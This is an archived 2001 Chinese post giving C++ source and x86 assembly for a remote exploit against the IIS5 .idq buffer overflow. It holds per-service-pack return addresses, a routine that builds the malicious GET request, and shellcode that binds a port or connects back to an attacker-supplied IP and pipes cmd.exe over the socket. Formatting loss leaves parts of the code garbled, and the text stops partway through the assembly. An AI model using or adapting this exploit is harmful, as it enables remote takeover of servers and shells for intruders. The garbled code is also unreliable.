

文章提交:inburst (inburst_at_263.net)


by snake. 2001/7/31 




cpp文件:    iisidqoverflow.cpp 和 SkShellCodeFunc.cpp
头文件:     SkShellCodeFunc.h
功能文件:  WSAStart.cpp和SnakeSocket.cpp wsastart.h snakesocket.h(这4个文件不提供...因为,他们实现的只是WSAStart和socket的功能,你要成功编译本程序,必须自己替换相关的WSAStart和socket功能的代码.特此声明!)
中间文件:  iis_idq.asm --用来实现shellcode数据的文件,编译的时候,不必编译,只是为了中间产生shellcode数据.它实现了溢出后,程序的处理:创建一个进程,并且绑定一个端口。这个还可以用于其他的windows溢出.

文件1:iisidqoverflow.cpp (主文件)

#include <afxwin.h>
#include "snakesocket.h"
#include "wsastart.h"
#include "SkShellCodeFunc.h"

//function predeclare.
//取得 需要 地址 信息
void GetNecesProcAddr( char *szInfo, int iMaxSize);
//生成我的 shell code代码.
int Sk_Make_IIS5_IDQ_ShellCode(char *pszOutput, SYSTEM_TYPE SystemType, ConnectStruct *pConnectStruct, LPCTSTR lpszBindCmd);

void ShowHelp()
  int i;

  printf("运行参数:  操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1>/r/n");
  printf("    或者:  操作系统类型 目的地址 web端口 2 溢出连接IP 溢出连接端口 <输入命令1>/r/n");
  printf("/r/n/r/n  其中,如果输入命令参数没有输入,那么,默认为:/"cmd.exe /c + dir/"");
  printf("/r/n  如果为1,那么,将输入新的命令.");

  printf("/r/n/r/n支持的操作系统 类型: ----/r/n");
  for( i=0; i 0){
    send( msocket, szBuff, iLen, 0);

  return (iLen>0)?true:false;

int main(int argc, char *argv[])
  CWSAStart wsaStart;
  CSnakeSocket snakeSocket;
  WORD wPort;

  if( argc > 1){
    if( stricmp( argv[1], "GetAddr") == 0){
      char szTemp[12048];
      GetNecesProcAddr(szTemp, sizeof(szTemp) );


      osInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
      GetVersionEx( &osInfo);
      printf("Version: %d - %d. Build:%d. ID:%d/r/n[%s]/r/n",
        osInfo.dwMajorVersion, osInfo.dwMinorVersion,
        osInfo.dwBuildNumber, osInfo.dwPlatformId,
      return 0;
  if( argc < 5){
    return 0;

  SYSTEM_TYPE SystemType = (SYSTEM_TYPE)atoi(argv[1]);
  if( SystemType >= MAX_SYSTEM_TYPE_NUM){
    printf("操作系统类型 不正确./r/n");
    return 0;
  dwIP = snakeSocket.GetHostAddr( argv[2]);
  if( dwIP == 0){
    return 0;

  Sk_ConnectType connectType;
  ConnectStruct connectStruct;
  char szCommand[129]="cmd.exe /c dir c://";
  BOOL bInputCommand=false;

  connectType = (Sk_ConnectType)atoi(argv[4]);
  connectStruct.byConnectType = connectType;
    connectStruct.wListenPort = atoi(argv[5]);
    if( argc >= 7){
      bInputCommand = true;
    if( argc < 6){
      return 0;
    connectStruct.dwConnectIP = snakeSocket.GetHostAddr(argv[5]);
    connectStruct.wConnectPort = atoi(argv[6]);
    if( argc >= 8){
      bInputCommand = true;
    return 0;

  if( bInputCommand){
    scanf( "%s",szCommand);

  wPort = atoi(argv[3]);

  if( !snakeSocket.connect( argv[2], wPort)){
    printf("连接目的机器 %s:%d 失败./r/n", argv[2], wPort);
    return 0;
    printf("连接目的机器 %s:%d OK./r/n", argv[2], wPort);

  BOOL bValue = SendIDQExploit( snakeSocket.m_Socket, SystemType, &connectStruct, szCommand);

  if( bValue){
    printf( "发送shellcode 到 %s:%d OK/r/n", argv[2], wPort);
    printf(" 现在,如果系统类型正确,并且漏洞存在,那么,应该 可以得到 [%s] 结果了...,good luck.!", szCommand);
    printf( "发送失败, 对方系统类型不支持/r/n");


  return 0;

文件2. SkShellCodeFunc.cpp (发送shellcode的文件)


// shellcode 函数

// start by snake. 2001/7/11

#include <windows.h>
#include "SkShellCodeFunc.h"

WORD Search_Jump_Ebx_Code(DWORD *dwArray, WORD wMaxCount);

static const char szSystemName[MAX_SYSTEM_TYPE_NUM+1][60]=
  "IIS5中文Win2k Sp0",
  "IIS5中文Win2k Sp1",
  "IIS5中文Win2k Sp2",

  "IIS5 English Win2k Sp0",
  "IIS5 English Win2k Sp1",
  "--IIS5 English Win2k Sp2",

  "IIS5 Japanese Win2k Sp0",
  "IIS5 Japanese Win2k Sp1",
  "--IIS5 Japanese Win2k Sp2",

  "IIS5 Mexico Win2k",
  "--IIS5 Mexico Win2k sp1",
  "--IIS5 Mexico Win2k sp2",


LPCTSTR GetSystemName( SYSTEM_TYPE type)
  return szSystemName[type];

typedef struct _Call_Func_Addr{
  DWORD dwGetModuleHandle;
  DWORD dwGetProcAddress;
  DWORD dwRetJmpEbxAddr;

static const Call_Func_Addr AllSystemFuncAddr[MAX_SYSTEM_TYPE_NUM]=
  { 0x77e756db, 0x77e7564b, 0x77e4ac97}, //IIS5_WIN2K_CHINESE_SP0
  { 0x77e6380e, 0x77e67031, 0x77E4BF17}, //IIS5_WIN2K_CHINESE_SP1
  { 0x77e66c42, 0x77e69ac1, 0x77e4ac97}, //IIS5_WIN2K_CHINESE_SP2

  { 0x77E956DB, 0x77E9564B, 0x77E6F533}, //IIS5_WIN2K_ENGLISH_SP0
  { 0x77E8380E, 0x77E87031, 0x77E6E52B}, //IIS5_WIN2K_ENGLISH_SP1
  { 0, 0}, //IIS5_WIN2K_ENGLISH_SP2

  { 0x77E656DB, 0x77E6564B, 0x77E3AF17}, //IIS5_WIN2K_JAPANESE_SP0,
  { 0x77E5380E, 0x77E57031, 0x77E3BCAF}, //IIS5_WIN2K_JAPANESE_SP1,
  { 0, 0}, //IIS5_WIN2K_JAPANESE_SP2,

  { 0x77E956DB, 0x77E9564B, 0x77E596D2 },//IIS_WIN2K_MEXICO_SP0,
  { 0, 0, 0 },//IIS_WIN2K_MEXICO_SP0,
  { 0, 0, 0 },//IIS_WIN2K_MEXICO_SP0,

//下面的#define 代码 的分析,是从isno的文章里面copy到的,thanks isno.
#define IIS5_IDQ_EXCEPTION_OFFSET 234 /* exception handler offset */
static unsigned char forwardjump[]= "%u08eb";
/*这是覆盖异常结构的jmp 08h,用来跳到后面寻址shellcode的那段代码*/

static unsigned char jump_to_shell[]=

char szSnakeBindShellCode[]=

static const char szSnakeSign[]="snake_program_code_v2.0";

#define PREHEAD_NOP_SIZE 0x24

#define dwConnectType_Offset 1249+PREHEAD_NOP_SIZE
#define dwListenPort_Offset 1253+PREHEAD_NOP_SIZE
#define dwConnectIP1_Offset 1257+PREHEAD_NOP_SIZE
#define dwConnectIP2_Offset 1261+PREHEAD_NOP_SIZE
#define dwConnectPort_Offset 1265+PREHEAD_NOP_SIZE
#define dwExecCommand_Offset 1269+PREHEAD_NOP_SIZE
#define wExecCommandSize 128
#define dwGetModuleHandle_Offset 1746+PREHEAD_NOP_SIZE
#define dwGetProcAddress_Offset 1750+PREHEAD_NOP_SIZE

BYTE byReservedValue[]={ 0, 0x0a, 0x0d};

;//转换标准word -> snake ShellCode Reserve Value.
;//该 byte == 0, 0x0a, 0x0d,那么,高位为2. 低位 +1.
;//                               高位 为1,低位不变.
DWORD Convert_Ansi_Word_To_Sk_Long(WORD wValue)
  int iReservCount, i;
  WORD wTemp;
  DWORD dwRetValue = 0;
  BOOL bFirst=true;

  iReservCount = sizeof(byReservedValue)/sizeof(BYTE);

    wTemp = wValue&0xff00;
    wTemp >>= 8;
    for( i=0; i<iReservCount; i++){
      if( wTemp == byReservedValue[i]) break;
    if( i == iReservCount)
      wTemp |= 0x0100;
      wTemp |= 0x0200;
    dwRetValue |= wTemp;
    if( bFirst){
      bFirst = false;
      dwRetValue <<= 16;
      wValue <<=8;
  return dwRetValue;

typedef void (*SkRunPointer)();

//生成我的 IIS5 idq shell code代码.
int Sk_Make_IIS5_IDQ_ShellCode(char *pszOutput, SYSTEM_TYPE SystemType, ConnectStruct *pConnectStruct, LPCTSTR lpszBindCmd)
  char szBuf[2048];
  char szOutput[10000], szCreateCode[10000];
  char *p;

  DWORD dwGetModuleHandle = 0, dwGetProcAddress=0, dwRetJmpEbx=0;

  switch( SystemType){
    wSelectValue = IIS5_WIN2K_CHINESE_SP0;
    wSelectValue = IIS5_WIN2K_CHINESE_SP1;
    wSelectValue = IIS5_WIN2K_CHINESE_SP2;

    wSelectValue = IIS5_WIN2K_ENGLISH_SP0;
    wSelectValue = IIS5_WIN2K_ENGLISH_SP1;

    wSelectValue = IIS5_WIN2K_JAPANESE_SP0;
    wSelectValue = IIS5_WIN2K_JAPANESE_SP1;
    wSelectValue = IIS5_WIN2K_JAPANESE_SP2;

    wSelectValue = IIS_WIN2K_MEXICO_SP0;
    wSelectValue = IIS_WIN2K_MEXICO_SP1;
    wSelectValue = IIS_WIN2K_MEXICO_SP2;

  if( wSelectValue >= MAX_SYSTEM_TYPE_NUM) return 0;

  dwGetModuleHandle = AllSystemFuncAddr[wSelectValue].dwGetModuleHandle;
  dwGetProcAddress = AllSystemFuncAddr[wSelectValue].dwGetProcAddress;
  dwRetJmpEbx = AllSystemFuncAddr[wSelectValue].dwRetJmpEbxAddr;

  if( dwGetModuleHandle == 0) return 0;

  memset( szBuf, 1, sizeof(szBuf));
  memcpy( szBuf, szSnakeSign, strlen(szSnakeSign));
  p = &(szBuf[IIS5_IDQ_EXCEPTION_OFFSET-2]);

  wsprintf( p,"%s", forwardjump);
  p += strlen((char *)forwardjump);
  *p++ = 1;
  *p++ = '%';
  *p++ = 'u';
  wsprintf( p, "%04x", (dwRetJmpEbx>>0)&0xffff);
  p += 4;
  *p ++ = '%';
  *p ++ = 'u';
  wsprintf( p, "%04x", (dwRetJmpEbx>>16)&0xffff);
  p += 4;
  *p++ = 1;
  wsprintf( p, "%s", jump_to_shell);

  //wsprintf( szOutput,"GET /n.idq?%s=b HTTP/1.0/r/nShell: %s/r/n/r/n", szBuf, szMyCode);
  wsprintf( szOutput,"GET /n.idq?%s=b HTTP/1.0/r/nSnake: ", szBuf);

  memcpy( szCreateCode, szSnakeBindShellCode, sizeof(szSnakeBindShellCode));

  //将地址信息, 端口信息 写入 shellcode代码.
  DWORD *pdw, dwTemp;
  WORD wTemp;
  char *lpsz, szExecTemp[wExecCommandSize];

  //Init Value.
  switch( pConnectStruct->byConnectType){
    szCreateCode[dwConnectType_Offset] = LISTEN_ON_PORT;
    dwTemp = Convert_Ansi_Word_To_Sk_Long( pConnectStruct->wListenPort);
    lpsz = &( szCreateCode[dwListenPort_Offset]);
    pdw = (DWORD *)lpsz;
    *pdw = dwTemp; //set listen port.
    szCreateCode[dwConnectType_Offset] = CONNECT_TO_HOST;
    wTemp = (WORD)( (pConnectStruct->dwConnectIP) & 0xffff);
    dwTemp = Convert_Ansi_Word_To_Sk_Long( wTemp);
    lpsz = &( szCreateCode[dwConnectIP2_Offset]);
    pdw = (DWORD *)lpsz;
    *pdw = dwTemp; //set IP1.

    wTemp = (WORD)( ((pConnectStruct->dwConnectIP) & 0xffff0000) >> 16);
    dwTemp = Convert_Ansi_Word_To_Sk_Long( wTemp);
    lpsz = &( szCreateCode[dwConnectIP1_Offset]);
    pdw = (DWORD *)lpsz;
    *pdw = dwTemp; //set IP2.

    dwTemp = Convert_Ansi_Word_To_Sk_Long( pConnectStruct->wConnectPort);
    lpsz = &( szCreateCode[dwConnectPort_Offset]);
    pdw = (DWORD *)lpsz;
    *pdw = dwTemp; //set connect Port.
    return 0;

  lpsz = &( szCreateCode[dwGetModuleHandle_Offset]);
  pdw = (DWORD *)lpsz;
  *pdw = dwGetModuleHandle; //set dwGetModuleHandle.

  lpsz = &( szCreateCode[dwGetProcAddress_Offset]);
  pdw = (DWORD *)lpsz;
  *pdw = dwGetProcAddress; //set dwGetProcAddress.

  memset( szExecTemp, '+', wExecCommandSize);
  wTemp = strlen( lpszBindCmd);
  if(wTemp >= wExecCommandSize)
    wTemp = wExecCommandSize-1;
  strncpy( szExecTemp, lpszBindCmd, wTemp);

  lpsz = &( szCreateCode[dwExecCommand_Offset]);
  memcpy( lpsz, szExecTemp, wExecCommandSize);

  strcat( szOutput, szCreateCode);
  strcat( szOutput, "/r/n/r/n");

  strcpy( pszOutput, szOutput);

  return strlen( pszOutput);

//取得 需要 地址 信息
void GetNecesProcAddr( char *szInfo, int iMaxSize)
  HANDLE hModule = GetModuleHandle("kernel32");
  DWORD dwAddr_GetHandle, dwAddr_GetProcAddr;
  char szOutput[11024], szJmpAddr[8124], szOne[20];
  DWORD dwJmpEbx[100];
  WORD wGetJmpCount,w;

  wGetJmpCount = Search_Jump_Ebx_Code(dwJmpEbx, 100);
  szJmpAddr[0] = 0;
  for( w=0; w<wGetJmpCount; w++){
    wsprintf( szOne," 0x%X", dwJmpEbx[w]);
    strcat( szJmpAddr, szOne);

  dwAddr_GetHandle = (DWORD)GetProcAddress( (HINSTANCE)hModule,"GetModuleHandleA");
  dwAddr_GetProcAddr = (DWORD)GetProcAddress( (HINSTANCE)hModule, "GetProcAddress");
  wsprintf( szOutput,"Addr1: 0x%X; Addr2: 0x%X/r/nJJ:%s",
    dwAddr_GetHandle, dwAddr_GetProcAddr, szJmpAddr);
  //MessageBox( NULL, szOutput, "topic", MB_OK);
  strncpy( szInfo, szOutput, iMaxSize);
  szInfo[iMaxSize-1] = 0;

#define JUMP_EBX_CODE 0xe3ff

WORD Search_Jump_Ebx_Code(DWORD *dwArray, WORD wMaxCount)
  HANDLE hDllModule = GetModuleHandle("user32");
  char *pValue;
  DWORD dwMin = (DWORD)hDllModule,dwMax;
  WORD wCount = 0;

  pValue = (char*)dwMin;
  wCount = 0;

  dwMax = dwMin + 400000; //size is 39kb.
  while( ( (DWORD)pValue) < dwMax){
    if( *((WORD *)pValue) == JUMP_EBX_CODE){
      dwArray[wCount++] = (DWORD)pValue;
      if( wCount >= wMaxCount) break;
  return wCount;

文件3. SkShellCodeFunc.h -- 必须的头文件

// header file for 定义shellcode 函数

// start by snake. 2001/7/11








typedef struct _ConnectStruct{
  BYTE byConnectType;
  WORD wListenPort;
  DWORD dwConnectIP;
  WORD wConnectPort;

LPCTSTR GetSystemName( SYSTEM_TYPE type);


文件4.iis_idq.asm --shellcode的汇编代码(编译不需要)
         .model flat,c

;//下面定义 连接 信息 结构.
stConnectInfo struct
  byConnectType db 0 ;//=1, 监听; =2,连结外部ip/port.
  byReserv1     db 1 ;//nothing just for Word Adjusted.
  dwReserv1     dw 1 ;//nothing just for Word Adjusted.
  dwListenPort  dd 0 ;//DDWORD dwIP1+dwIP2;
  dwIP1         dd 0  ;// //IP 和端口,一位用2位表示. 高位为类型,低位为值.
  dwIP2         dd 0  ;// 1.高位 =1, 低位为普通value.
  dwConnectPort dd 0  ;// 2.高位 = 2, 低位 应该 = value -1
stConnectInfo ends

;//用到的函数 结构
SkOverflowFuncAddr struct
  TerminateProcess dd 0;
  CreatePipe dd 0;
  GetStartupInfoA dd 0;
  CreateProcessA dd 0;
  PeekNamedPipe dd 0;
  GlobalAlloc dd 0;
  WriteFile dd 0;
  ReadFile dd 0;
  Sleep dd 0;
  ExitProcess dd 0;
  GetLastError dd 0;
  DuplicateHandle dd 0;
  GetCurrentProcess dd 0;
  CloseHandle dd 0;
  socket dd 0;
  bind dd 0;
  listen dd 0;
  accept dd 0;
  send dd 0;
  recv dd 0;
  setsockopt dd 0;
  WSAStartup dd 0;
  closesocket dd 0;
  connect dd 0;
  gethostname dd 0;
SkOverflowFuncAddr ends

    cb   dd 0;
    lpReserved  dd 0;
    lpDesktop  dd 0;
    lpTitle  dd 0;
    dwX   dd 0;
    dwY   dd 0;
    dwXSize   dd 0;
    dwYSize   dd 0;
    dwXCountChars   dd 0;
    dwYCountChars   dd 0;
    dwFillAttribute   dd 0;
    dwFlags   dd 0;
    wShowWindow    dw 0;
    cbReserved2    dw 0;
    lpReserved2  dd 0;
    hStdInput  dd 0;
    hStdOutput  dd 0;
    hStdError  dd 0;

    hProcess dd 0;
    hThread dd 0;
    dwProcessId dd 0;
    dwThreadId dd 0;

;//管套 - 命令交互 结构
Shell_Cmd_Pipe struct
  hReadPipe dd 0;
  ShellStdoutPipe dd 0;
  hWritePipe dd 0;
  ShellStdinPipe dd 0;
  msocket dd 0;
  ProcessInformation PROCESS_INFORMATION <>;
  nstartupinfo STARTUPINFO <>;
Shell_Cmd_Pipe ends

Recv_Write_Socket_Pipe_Data struct
  szTemp db SIZE_OF_TEMP_BUFFER dup(0)
  dwBreak DD 0
  dwTemp DD 0
Recv_Write_Socket_Pipe_Data ends;

    sin_family dw 0;
    sin_port  dw 0;
    sin_addr dd 0;
    sin_zero db 8 dup(0);

    nLength DD 0;
    lpSecurityDescriptor DD 0;
    bInheritHandle   DD 0;

FUNC_PARAM_1 equ [ebp+8]
FUNC_PARAM_2 equ [ebp+0ch]
FUNC_PARAM_3 equ [ebp+10h]
FUNC_PARAM_4 equ [ebp+14h]
FUNC_PARAM_5 equ [ebp+18h]
FUNC_PARAM_6 equ [ebp+1ch]
FUNC_PARAM_7 equ [ebp+20h]

SO_RCVTIMEO     equ 1006h ;//         receive timeout
SOL_SOCKET      equ 0ffffh ;//          options for socket level

Shell_Cmd_Pipe_OFFSET equ 3f0h
SkOverflowFuncAddr_OFFSET equ 2d0h
szShellNeedFunc_OFFSET equ 1d0h

  public _sk_Bind_ConnectShellCode
  public _GetDataSetOffset_Value
_sk_Bind_ConnectShellCode proc
    push ebp;
    mov ebp, esp;
    ;//产生 0x800的堆栈 空间.
    xor eax,eax;
    inc eax;
    shl eax, 0bh; //=>0x800
    sub esp, eax;

    jmp call_back;
    jmp run_actual1;
    call jump_next;
    ;//jmp quit_return; //not run here as no necessary.
    ;//(void *ptr, int iLen, DWORD dwOld, DWORD dwNew)
    push ebp;
    mov ebp, esp;
    push edi;
    push ecx;
    push eax;
    push edx;

    mov edi, FUNC_PARAM_1; //第1个参数.
    mov ecx, FUNC_PARAM_2; //第2个参数.
    mov eax, FUNC_PARAM_3; //第3个参数.
    mov edx, FUNC_PARAM_4; //第4个参数.

    ;//重复查找,替换,直到cx = 0
    repnz scasb;
    jcxz Finish_Replace_Add_Sign;

    dec edi;
    mov byte ptr [edi], dl;
    inc ecx;
    jmp NextAddSign;
    pop edx;
    pop eax;
    pop ecx;
    pop edi;

    pop ebp;
  ;//转换eax的long -> ax 标准word.
  ;//rule: 1.高位 =1, 低位为普通value.
  ;//      2.高位 = 2, 低位 应该 = value -1
    push ebx;
    push ecx;
    push edx;

    xor edx, edx;

    push eax; //低位 ->ebx
    pop ebx;
    shr ebx, 10h;

    push eax; //高位 -> ecx
    pop ecx;
    cmp bh, 1;
    je _convert_Sk_Long_IsNormal;
    dec bl;

    mov al, bl;

    test edx, edx;
    jnz Finish_Convert_Next_Bit;

    shl eax, 8;
    push ecx;
    pop ebx;
    inc edx;
    jmp _Convert_bx_To_al_Short

    pop edx;
    pop ecx;
    pop ebx;
    jmp run_actual2;
  ;//从 szShellNeedFunc 取得 SkOverflowFuncAddr的地址
  ;//void _Get_Overflow_Addr_From_Shell_Func( void *SkOverflowFuncAddr,
  ;//                                         char *ShellNeedFuncStr,
  ;//                                         DWORD dwGetModuleHandleAddr,
  ;//                                         DWORD dwGetProcAddr)
    push ebp;
    mov ebp, esp;

    push esi;
    push edi;
    push edx;
    push ecx;
    push ebx;
    push eax;

    mov edi, FUNC_PARAM_1;  //第1个参数
    mov esi, FUNC_PARAM_2; //第2个参数

    xor ebx,ebx;
    xor ecx,ecx;
    add esi, ecx; //esi = szShellCodeNeedFunc+SHELL_NEED_FUNC_BODY_OFFSET

    mov cl, byte ptr [esi];
    inc esi;
    push ecx;

    mov bl, byte ptr [esi];
    inc esi; //skip size.

    push esi;

    mov eax, FUNC_PARAM_3; //第3个参数.
    ;//mov eax, GetModuleHandleA_Addr; //GetModuleHandleA

    call eax;

    add esi, ebx; //go to next address.
    ;//现在,esi指向 函数 数目.
    xor ecx, ecx;
    mov cl, byte ptr [esi];
    inc esi;

    push ecx;

    mov bl, byte ptr [esi];
    inc esi;

    push eax;
    push esi;

    push esi; //procName
    push eax; //module

    mov ecx, FUNC_PARAM_4; //第3个参数.
    ;//mov eax, GetModuleHandleA_Addr; //GetModuleHandleA
    call ecx;

    mov dword ptr [edi], eax;
    add edi, 4;

    pop esi;
    pop eax;

    add esi, ebx; //指针移动到下一个字符串.

    pop ecx;
    loop _NextFunction_Addr;

    pop ecx;
    loop _NextDllNameToLoad;

    pop eax;
    pop ebx;
    pop ecx;
    pop edx;
    pop edi;
    pop esi;

    pop ebp;
    jmp run_actual3_1;
  ;//创建 一个管套,监听一个端口,返回该管套.
  ;//SOCKET _Create_Bind_Connect_Socket_To_Port( SkOverflowFuncAddr *pFuncAddr, szShellNeedFunc *pNeedFunc);
    push ebp;
    mov ebp, esp;

    xor eax, eax; //开辟0xff(256)个byte的变量区域.
    mov ax, 3f0h
    sub esp, eax;

    push esi;
    push edi;
    push edx;
    push ecx;
    push ebx;

    mov esi, FUNC_PARAM_1; //第一个参数.

    lea edi, [ebp-340h]; //开辟个空间做临时变量.
    xor eax, eax;
    mov al,2;
    push edi;
    push eax;
    mov eax, [esi+SkOverflowFuncAddr.WSAStartup];
    call eax;

    ;//msocket = socket( AF_INET, SOCK_STREAM, 0); = (2,1,0)
    xor eax, eax;
    push eax;
    inc eax;
    push eax;
    inc eax;
    push eax;

    mov eax, [esi+SkOverflowFuncAddr.socket];
    call eax;

    mov edx, FUNC_PARAM_2;
    lea ebx, [edx+stConnectInfo.byConnectType];
    mov cl, BYTE PTR [ebx];

    push eax;
    ;//准备参数 SOCKADDR_IN
    lea edi, [ebp-0f0h]; //现在是sockaddr_in的地址.
    lea ebx, [edi + SOCKADDR_IN.sin_family];
    xor eax, eax;
    mov al,2;
    mov word ptr [ebx], ax; //SOCKADDR_IN.sin_family = AF_INET
    pop eax;

    ;//edi --- 临时变量 sockaddr_in, (sin_family = AF_INET 被赋值)
    ;//edx --- 参数2 stConnectInfo 连结信息
    ;//eax --- 创建的管套 newsocket.
    ;//esi --- 参数1 SkOverflowFuncAddr 函数地址.

    cmp cl,1 ;//是监听吗?
    jne _IsConnectToIP; //no. 跳转.

    push eax; // <-2@

    push eax; // <-1@

    mov eax, [edx+stConnectInfo.dwListenPort];
    call _convert_Sk_Long_To_Ansi_Word;
    mov ecx, eax;
    xchg ch,cl; //port = htons(port)

    pop eax; // ->1@

    lea ebx, [edi + SOCKADDR_IN.sin_port];
    mov edx, FUNC_PARAM_2; //第2个参数.
    mov word ptr [ebx], cx; //SOCKADDR_IN.sin_port = port.

    xor eax, eax;
    lea ebx, [edi + SOCKADDR_IN.sin_addr];
    mov dword ptr [ebx], eax; //SOCKADDR_IN.sin_addr.S_un.S_addr = INADDR_ANY

    pop eax; // ->2@
    push eax; //<-3@

    ;//bind( msocket, (SOCKADDR *)&addrin, sizeof(addrin));
    xor ecx, ecx;
    mov cl, size sockaddr_in;
    push ecx;
    push edi;
    push eax;

    mov eax, [esi+SkOverflowFuncAddr.bind];
    call eax;
  ;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.
    jmp _temp_1;

    jmp run_actual3_2;


    pop eax; //->3@
    push eax; //<-4@

    ;//listen( msocket, 1);
    xor ecx, ecx;
    inc ecx;
    push ecx;
    push eax;

    mov eax, [esi+SkOverflowFuncAddr.listen];
    call eax;

    pop eax; //->4@
    push eax; //<-5@

    ;//newsocket = accept( msocket, (SOCKADDR*)&addrin, &iLen);
    xor ecx, ecx;
    mov cl, size sockaddr_in;
    lea edi, [ebp-0c0h];
    mov [edi], ecx;
    push edi; //iLen = sizeof(addrin);
    lea edi, [ebp-0f0h];
    push edi; //&SOCKADDR_IN 结构.
    push eax;

    mov eax,[esi+SkOverflowFuncAddr.accept];
    call eax;

    pop edx; //->5@ //用来listen的socket.由eax->edx

    push eax; //<-6@  //得到新的连结管套..

    ;//关闭 用来 listen的socket.
    ;//closesocket( msocket);
    push edx;
    mov eax, [esi+SkOverflowFuncAddr.closesocket];
    call eax;

    pop eax; //->6@

    cmp eax, -1;
    je WSocket_QuitRightNow;

    jmp Finish_Get_Connection_Socket;

_IsConnectToIP: ;//连接到一个ip:port
    ;//addrin.sin_family = AF_INET;
    ;//addrin.sin_addr.S_un.S_addr = 0x0100007f;
    ;//addrin.sin_port = 0x8b; //139.

    ;//connect( socket, (SOCKADDR*)&addrin, sizeof(addrin));
    ;//准备参数 SOCKADDR_IN
    ;//edi --- 临时变量 sockaddr_in, (sin_family = AF_INET 被赋值)
    ;//edx --- 参数2 stConnectInfo 连结信息
    ;//eax --- 创建的管套 newsocket.
    ;//esi --- 参数1 SkOverflowFuncAddr 函数地址.

    push eax; //<-1@

    mov eax, [edx+stConnectInfo.dwConnectPort];
    call _convert_Sk_Long_To_Ansi_Word;
    mov ecx, eax;
    xchg ch,cl; //port = htons(port)

    lea ebx, [edi + SOCKADDR_IN.sin_port];
    mov word ptr [ebx], cx; //SOCKADDR_IN.sin_port = port.

  ;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.
    jmp _temp_1_1;

    jmp run_actual3;


    mov eax, [edx+stConnectInfo.dwIP1];
    call _convert_Sk_Long_To_Ansi_Word;
    mov ecx, eax;
    shl ecx, 10h;
    mov eax, [edx+stConnectInfo.dwIP2];
    call _convert_Sk_Long_To_Ansi_Word;
    mov cx, ax;
    lea ebx, [edi + SOCKADDR_IN.sin_addr];
    mov dword ptr [ebx], ecx; //SOCKADDR_IN.sin_addr.S_un.S_addr = stConnectInfo.dwIP1 + dwIP2

    pop eax; //->1@
    push eax; //<-2@

    ;//connect(msocket, addr, 0x10);
    xor ecx, ecx;
    mov cl, 10h;
    push ecx;  //sizeof(SOCKADDR_IN);
    push edi;  //SOCKADDR *
    push eax;  //msocket.
    mov eax, [esi+SkOverflowFuncAddr.connect];
    call eax; //connect.

    mov ecx, eax;
    pop eax;     //->2@
    jcxz Finish_Get_Connection_Socket; //connect success.

    ;//now, connect failure.
    push eax;
    mov eax, [esi+SkOverflowFuncAddr.closesocket];
    call eax;

    xor eax, eax;
    jmp WSocket_QuitRightNow;

    push eax;

    push eax;
    pop edx; //edx = eax

    ;//  setsockopt( newsocket, SOL_SOCKET, SO_RCVTIMEO, (LPCTSTR)&iLen, sizeof(iLen));
    lea edi, [ebp-0f0h];
    xor eax, eax;
    mov al, 1;
    mov [edi], eax;
    shl eax, 2; //eax = 4

    push eax;
    push edi;
    mov ax, SO_RCVTIMEO;
    push eax;
    mov ax, SOL_SOCKET;
    push eax;
    push edx;

    mov eax, [esi+SkOverflowFuncAddr.setsockopt];
    call eax;

    pop eax;
    pop ebx;
    pop ecx;
    pop edx;
    pop edi;
    pop esi;

    mov esp, ebp;

    pop ebp;
    jmp run_actual4_1;
  ;//在管套 pipe 上,运行进程 pStrCmd;
  ;//_Create_Process_To_Handle( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe, LPCTSTR *pStrCmd);
    push ebp;
    mov ebp, esp;

    push edi;
    push esi;
    push edx;
    push ecx;
    push ebx;
    push eax;

    mov edi, FUNC_PARAM_2; //Shell_Cmd_Pipe *pCmdPipeData;

    push edi;
    pop edx; //edx = edi;
    ;//memset( &si, 0, sizeof(STARTUPINFO));
    xor eax, eax;
    lea edi, [edi +Shell_Cmd_Pipe.nstartupinfo];
    push edi; //edi = &STARTUPINFO; ---
    xor ecx, ecx;
    mov cl, size STARTUPINFO;
    rep stosb;

    pop edi;  //                    ---

    ;//si.cb = sizeof(STARTUPINFO);
    lea esi, [edi + STARTUPINFO.cb];
    mov cl, size STARTUPINFO;
    mov [esi], ecx;
    ;//si.wShowWindow = SW_HIDE = 0; //need to do nothing.
    lea esi, [edi + STARTUPINFO.dwFlags];
    mov cx, 101h;
    mov [esi], ecx;
    ;//si.hStdInput = ShellStdinPipe;
    push edi;
    lea edi, [edi + STARTUPINFO.hStdInput];
    lea esi, [edx + Shell_Cmd_Pipe.ShellStdinPipe];
    mov eax, [esi];
    mov [edi], eax;
    pop edi;
    ;//si.hStdOutput = ShellStdoutPipe;
    push edi;
    lea edi, [edi+STARTUPINFO.hStdOutput];
    lea esi, [edx+Shell_Cmd_Pipe.ShellStdoutPipe];
    mov eax, [esi];
    mov [edi], eax;
    pop edi;

    ;// DuplicateHandle( GetCurrentProcess(), ShellStdoutPipe, GetCurrentProcess(),
    ;//                  &(si.hStdError),DUPLICATE_SAME_ACCESS, TRUE, 0);
    mov esi, FUNC_PARAM_1;
    mov eax, [esi+SkOverflowFuncAddr.GetCurrentProcess];
    call eax;

    xor ecx, ecx;
    push ecx;         //0
    inc ecx;
    push ecx;         //TRUE
    inc ecx;
    push ecx;         //DUPLICATE_SAME_ACCESS
    lea edx, [edi+STARTUPINFO.hStdError];
    push edx;         //&(si.hStdError)
    push eax;         //GetCurrentProcess();
    push esi;
    mov esi, FUNC_PARAM_2;
    lea esi, [esi+Shell_Cmd_Pipe.ShellStdoutPipe];
    mov ebx, [esi];
    pop esi;

    ;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.
    jmp _temp_2;

    jmp run_actual4;


    push ebx;         //ShellStdoutPipe
    push eax;         //GetCurrentProcess();

    mov eax, [esi+SkOverflowFuncAddr.DuplicateHandle];
    call eax;

    ;// CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, 0,
    ;//                NULL, NULL, &si, &ProcessInformation )
    xor eax, eax;
    mov edi, FUNC_PARAM_2;
    lea edx, [edi+Shell_Cmd_Pipe.ProcessInformation];
    push edx;            ;//&ProcessInformation
    lea edx, [edi+Shell_Cmd_Pipe.nstartupinfo];
    push edx;            ;//&si
    push eax;            ;//NULL;
    push eax;            ;//NULL;
    push eax;            ;//0;
    inc eax;
    push eax;            ;//TRUE;
    dec eax;
    push eax;            ;//NULL;
    push eax;            ;//NULL;
    mov edx, FUNC_PARAM_3;
